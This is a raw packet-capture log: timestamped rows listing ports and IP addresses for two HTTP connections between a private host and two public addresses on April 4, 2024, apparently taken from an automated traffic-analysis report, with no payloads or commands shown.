Apr 4, 2024 17:49:05.815421104 CEST	49731	80	192.168.2.10	190.249.187.165
Apr 4, 2024 17:49:05.815469980 CEST	80	49731	190.249.187.165	192.168.2.10
Apr 4, 2024 17:49:05.815498114 CEST	80	49731	190.249.187.165	192.168.2.10
Apr 4, 2024 17:49:05.815608978 CEST	80	49731	190.249.187.165	192.168.2.10
Apr 4, 2024 17:49:05.815612078 CEST	49731	80	192.168.2.10	190.249.187.165
Apr 4, 2024 17:49:05.815650940 CEST	49731	80	192.168.2.10	190.249.187.165
Apr 4, 2024 17:49:05.815733910 CEST	80	49731	190.249.187.165	192.168.2.10
Apr 4, 2024 17:49:05.815745115 CEST	80	49731	190.249.187.165	192.168.2.10
Apr 4, 2024 17:49:05.815778017 CEST	49731	80	192.168.2.10	190.249.187.165
Apr 4, 2024 17:49:05.815789938 CEST	49731	80	192.168.2.10	190.249.187.165
Apr 4, 2024 17:49:05.815835953 CEST	80	49731	190.249.187.165	192.168.2.10
Apr 4, 2024 17:49:05.815876961 CEST	49731	80	192.168.2.10	190.249.187.165
Apr 4, 2024 17:49:05.815958023 CEST	80	49731	190.249.187.165	192.168.2.10
Apr 4, 2024 17:49:05.815998077 CEST	49731	80	192.168.2.10	190.249.187.165
Apr 4, 2024 17:49:05.816122055 CEST	80	49731	190.249.187.165	192.168.2.10
Apr 4, 2024 17:49:05.816242933 CEST	49731	80	192.168.2.10	190.249.187.165
Apr 4, 2024 17:49:05.816265106 CEST	80	49731	190.249.187.165	192.168.2.10
Apr 4, 2024 17:49:05.816279888 CEST	80	49731	190.249.187.165	192.168.2.10
Apr 4, 2024 17:49:05.816309929 CEST	49731	80	192.168.2.10	190.249.187.165
Apr 4, 2024 17:49:05.816329956 CEST	49731	80	192.168.2.10	190.249.187.165
Apr 4, 2024 17:49:05.816359043 CEST	80	49731	190.249.187.165	192.168.2.10
Apr 4, 2024 17:49:05.816478014 CEST	80	49731	190.249.187.165	192.168.2.10
Apr 4, 2024 17:49:05.816521883 CEST	49731	80	192.168.2.10	190.249.187.165
Apr 4, 2024 17:49:05.816553116 CEST	80	49731	190.249.187.165	192.168.2.10
Apr 4, 2024 17:49:05.816601992 CEST	49731	80	192.168.2.10	190.249.187.165
Apr 4, 2024 17:49:05.816730022 CEST	80	49731	190.249.187.165	192.168.2.10
Apr 4, 2024 17:49:05.816745043 CEST	80	49731	190.249.187.165	192.168.2.10
Apr 4, 2024 17:49:05.816771984 CEST	49731	80	192.168.2.10	190.249.187.165
Apr 4, 2024 17:49:05.816795111 CEST	49731	80	192.168.2.10	190.249.187.165
Apr 4, 2024 17:49:05.816816092 CEST	80	49731	190.249.187.165	192.168.2.10
Apr 4, 2024 17:49:05.816858053 CEST	49731	80	192.168.2.10	190.249.187.165
Apr 4, 2024 17:49:05.816879034 CEST	80	49731	190.249.187.165	192.168.2.10
Apr 4, 2024 17:49:05.816915989 CEST	49731	80	192.168.2.10	190.249.187.165
Apr 4, 2024 17:49:05.816977024 CEST	80	49731	190.249.187.165	192.168.2.10
Apr 4, 2024 17:49:05.817018986 CEST	49731	80	192.168.2.10	190.249.187.165
Apr 4, 2024 17:49:05.817239046 CEST	80	49731	190.249.187.165	192.168.2.10
Apr 4, 2024 17:49:05.817277908 CEST	49731	80	192.168.2.10	190.249.187.165
Apr 4, 2024 17:49:05.817354918 CEST	80	49731	190.249.187.165	192.168.2.10
Apr 4, 2024 17:49:05.817373037 CEST	80	49731	190.249.187.165	192.168.2.10
Apr 4, 2024 17:49:05.817411900 CEST	49731	80	192.168.2.10	190.249.187.165
Apr 4, 2024 17:49:06.021663904 CEST	80	49731	190.249.187.165	192.168.2.10
Apr 4, 2024 17:49:06.021908045 CEST	80	49731	190.249.187.165	192.168.2.10
Apr 4, 2024 17:49:06.021923065 CEST	80	49731	190.249.187.165	192.168.2.10
Apr 4, 2024 17:49:06.021981001 CEST	49731	80	192.168.2.10	190.249.187.165
Apr 4, 2024 17:49:06.021997929 CEST	80	49731	190.249.187.165	192.168.2.10
Apr 4, 2024 17:49:06.022027016 CEST	49731	80	192.168.2.10	190.249.187.165
Apr 4, 2024 17:49:06.022056103 CEST	49731	80	192.168.2.10	190.249.187.165
Apr 4, 2024 17:49:06.022154093 CEST	80	49731	190.249.187.165	192.168.2.10
Apr 4, 2024 17:49:06.022166967 CEST	80	49731	190.249.187.165	192.168.2.10
Apr 4, 2024 17:49:06.022193909 CEST	49731	80	192.168.2.10	190.249.187.165
Apr 4, 2024 17:49:06.022212029 CEST	49731	80	192.168.2.10	190.249.187.165
Apr 4, 2024 17:49:06.024287939 CEST	80	49731	190.249.187.165	192.168.2.10
Apr 4, 2024 17:49:06.024352074 CEST	49731	80	192.168.2.10	190.249.187.165
Apr 4, 2024 17:49:06.024389982 CEST	80	49731	190.249.187.165	192.168.2.10
Apr 4, 2024 17:49:06.024430037 CEST	49731	80	192.168.2.10	190.249.187.165
Apr 4, 2024 17:49:06.024635077 CEST	80	49731	190.249.187.165	192.168.2.10
Apr 4, 2024 17:49:06.024653912 CEST	80	49731	190.249.187.165	192.168.2.10
Apr 4, 2024 17:49:06.024682999 CEST	49731	80	192.168.2.10	190.249.187.165
Apr 4, 2024 17:49:06.024698019 CEST	49731	80	192.168.2.10	190.249.187.165
Apr 4, 2024 17:49:06.024992943 CEST	80	49731	190.249.187.165	192.168.2.10
Apr 4, 2024 17:49:06.025034904 CEST	49731	80	192.168.2.10	190.249.187.165
Apr 4, 2024 17:49:06.025158882 CEST	80	49731	190.249.187.165	192.168.2.10
Apr 4, 2024 17:49:06.025175095 CEST	80	49731	190.249.187.165	192.168.2.10
Apr 4, 2024 17:49:06.025243044 CEST	49731	80	192.168.2.10	190.249.187.165
Apr 4, 2024 17:49:06.025367022 CEST	80	49731	190.249.187.165	192.168.2.10
Apr 4, 2024 17:49:06.025407076 CEST	49731	80	192.168.2.10	190.249.187.165
Apr 4, 2024 17:49:06.025537014 CEST	80	49731	190.249.187.165	192.168.2.10
Apr 4, 2024 17:49:06.025547981 CEST	80	49731	190.249.187.165	192.168.2.10
Apr 4, 2024 17:49:06.025593042 CEST	49731	80	192.168.2.10	190.249.187.165
Apr 4, 2024 17:49:06.025651932 CEST	80	49731	190.249.187.165	192.168.2.10
Apr 4, 2024 17:49:06.025662899 CEST	80	49731	190.249.187.165	192.168.2.10
Apr 4, 2024 17:49:06.025693893 CEST	49731	80	192.168.2.10	190.249.187.165
Apr 4, 2024 17:49:06.025707960 CEST	49731	80	192.168.2.10	190.249.187.165
Apr 4, 2024 17:49:06.025829077 CEST	80	49731	190.249.187.165	192.168.2.10
Apr 4, 2024 17:49:06.025840044 CEST	80	49731	190.249.187.165	192.168.2.10
Apr 4, 2024 17:49:06.025871038 CEST	49731	80	192.168.2.10	190.249.187.165
Apr 4, 2024 17:49:06.025887966 CEST	80	49731	190.249.187.165	192.168.2.10
Apr 4, 2024 17:49:06.025897026 CEST	49731	80	192.168.2.10	190.249.187.165
Apr 4, 2024 17:49:06.025904894 CEST	80	49731	190.249.187.165	192.168.2.10
Apr 4, 2024 17:49:06.025924921 CEST	49731	80	192.168.2.10	190.249.187.165
Apr 4, 2024 17:49:06.025938988 CEST	80	49731	190.249.187.165	192.168.2.10
Apr 4, 2024 17:49:06.025943041 CEST	49731	80	192.168.2.10	190.249.187.165
Apr 4, 2024 17:49:06.025953054 CEST	80	49731	190.249.187.165	192.168.2.10
Apr 4, 2024 17:49:06.025978088 CEST	49731	80	192.168.2.10	190.249.187.165
Apr 4, 2024 17:49:06.025991917 CEST	49731	80	192.168.2.10	190.249.187.165
Apr 4, 2024 17:49:06.041208982 CEST	80	49731	190.249.187.165	192.168.2.10
Apr 4, 2024 17:49:06.041274071 CEST	49731	80	192.168.2.10	190.249.187.165
Apr 4, 2024 17:49:06.041419983 CEST	80	49731	190.249.187.165	192.168.2.10
Apr 4, 2024 17:49:06.041455984 CEST	49731	80	192.168.2.10	190.249.187.165
Apr 4, 2024 17:49:06.041486979 CEST	80	49731	190.249.187.165	192.168.2.10
Apr 4, 2024 17:49:06.041521072 CEST	49731	80	192.168.2.10	190.249.187.165
Apr 4, 2024 17:49:06.041564941 CEST	80	49731	190.249.187.165	192.168.2.10
Apr 4, 2024 17:49:06.041598082 CEST	49731	80	192.168.2.10	190.249.187.165
Apr 4, 2024 17:49:06.041632891 CEST	80	49731	190.249.187.165	192.168.2.10
Apr 4, 2024 17:49:06.041665077 CEST	49731	80	192.168.2.10	190.249.187.165
Apr 4, 2024 17:49:06.042896986 CEST	80	49731	190.249.187.165	192.168.2.10
Apr 4, 2024 17:49:06.042911053 CEST	80	49731	190.249.187.165	192.168.2.10
Apr 4, 2024 17:49:06.042943001 CEST	49731	80	192.168.2.10	190.249.187.165
Apr 4, 2024 17:49:06.042960882 CEST	49731	80	192.168.2.10	190.249.187.165
Apr 4, 2024 17:49:06.043253899 CEST	80	49731	190.249.187.165	192.168.2.10
Apr 4, 2024 17:49:06.043299913 CEST	80	49731	190.249.187.165	192.168.2.10
Apr 4, 2024 17:49:06.043334961 CEST	49731	80	192.168.2.10	190.249.187.165
Apr 4, 2024 17:49:06.043355942 CEST	80	49731	190.249.187.165	192.168.2.10
Apr 4, 2024 17:49:06.043390989 CEST	49731	80	192.168.2.10	190.249.187.165
Apr 4, 2024 17:49:06.043404102 CEST	80	49731	190.249.187.165	192.168.2.10
Apr 4, 2024 17:49:06.043435097 CEST	49731	80	192.168.2.10	190.249.187.165
Apr 4, 2024 17:49:06.043442011 CEST	80	49731	190.249.187.165	192.168.2.10
Apr 4, 2024 17:49:06.043459892 CEST	80	49731	190.249.187.165	192.168.2.10
Apr 4, 2024 17:49:06.043477058 CEST	49731	80	192.168.2.10	190.249.187.165
Apr 4, 2024 17:49:06.043493032 CEST	49731	80	192.168.2.10	190.249.187.165
Apr 4, 2024 17:49:06.043611050 CEST	80	49731	190.249.187.165	192.168.2.10
Apr 4, 2024 17:49:06.043704033 CEST	49731	80	192.168.2.10	190.249.187.165
Apr 4, 2024 17:49:06.043867111 CEST	49731	80	192.168.2.10	190.249.187.165
Apr 4, 2024 17:49:06.103094101 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.103137970 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.103204966 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:06.103224039 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.103254080 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.103300095 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:06.103302956 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.103367090 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.103382111 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.103420019 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:06.103451014 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.103508949 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.103550911 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:06.103569984 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.103635073 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.103672028 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:06.103701115 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.103781939 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.103826046 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:06.103840113 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.103864908 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.103880882 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:06.103935957 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.103955030 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.103991985 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:06.104038000 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.104084969 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.104152918 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:06.104190111 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.104238987 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.104279995 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:06.104324102 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.104362011 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:06.104372025 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.104433060 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.104471922 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:06.104482889 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.104526043 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.104572058 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:06.104572058 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.104597092 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.104666948 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.104707956 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:06.104712963 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.104726076 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.104763985 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:06.104780912 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.104816914 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:06.104845047 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.104880095 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.104919910 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:06.104927063 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.104995966 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.105036974 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:06.105043888 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.105082989 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.105118036 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.105138063 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.105149031 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:06.105179071 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:06.105185986 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.105226040 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.105252981 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.105262041 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:06.105325937 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.105371952 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.105410099 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:06.105447054 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.105521917 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.105560064 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:06.105583906 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.105621099 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.105623007 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:06.105695963 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.105736971 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:06.105757952 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.105824947 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.105839014 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.105859041 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:06.105915070 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.105945110 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.105953932 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:06.106036901 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.106118917 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.106122017 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:06.106149912 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.106209993 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.106276989 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.106291056 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.106297970 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:06.106365919 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.106391907 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:06.106408119 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:06.106419086 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.106446028 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.106482983 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:06.106524944 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.106570959 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.106611013 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:06.106621981 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.106664896 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.106712103 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.106749058 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.106749058 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:06.106879950 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.106931925 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:06.106940985 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.106981993 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:06.106992006 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.107110023 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.107151985 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:06.107152939 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.107177973 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.107217073 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:06.107414961 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.107439041 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.107479095 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:06.107501984 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.107539892 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.107605934 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.107651949 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.107652903 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:06.107708931 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.107747078 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:06.107770920 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.107825994 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.107862949 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:06.107898951 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.107933044 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:06.107958078 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.108030081 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.108072996 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.108117104 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:06.108155012 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.108200073 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.108234882 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:06.108256102 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.108326912 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.108361959 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:06.108378887 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.108416080 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:06.108438015 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.108474970 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.108515978 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:06.108572006 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.108624935 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.108665943 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:06.108690977 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.108732939 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.108772039 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:06.108787060 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.108799934 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.108824015 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.108836889 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:06.108896971 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.108941078 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:06.108956099 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.109018087 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.109069109 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.109106064 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:06.109107971 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.109183073 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.109195948 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.109226942 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:06.109241009 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:06.109266043 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.109342098 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.109401941 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.109436035 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.109440088 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:06.109473944 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:06.109487057 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.109554052 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.109590054 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:06.109596968 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.109637022 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.109673023 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:06.109690905 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.109733105 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.109767914 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:06.109786987 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.109858036 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.109918118 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.109930038 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.109955072 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:06.109981060 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:06.109997988 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.110044956 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.110085964 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:06.110106945 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.110155106 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.110167027 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.110203981 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:06.110260010 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.110271931 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.110296965 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:06.110321999 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.110403061 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.110445976 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:06.110454082 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.110477924 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.110511065 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:06.110552073 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.110596895 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:06.110626936 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.110732079 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.110769987 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:06.110799074 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.110835075 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.110871077 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:06.110902071 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.110949993 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.111008883 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.111047983 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:06.111128092 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.111248016 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.111285925 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:06.111299038 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.111346006 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.111382961 CEST	49730	80	192.168.2.10	103.23.232.80
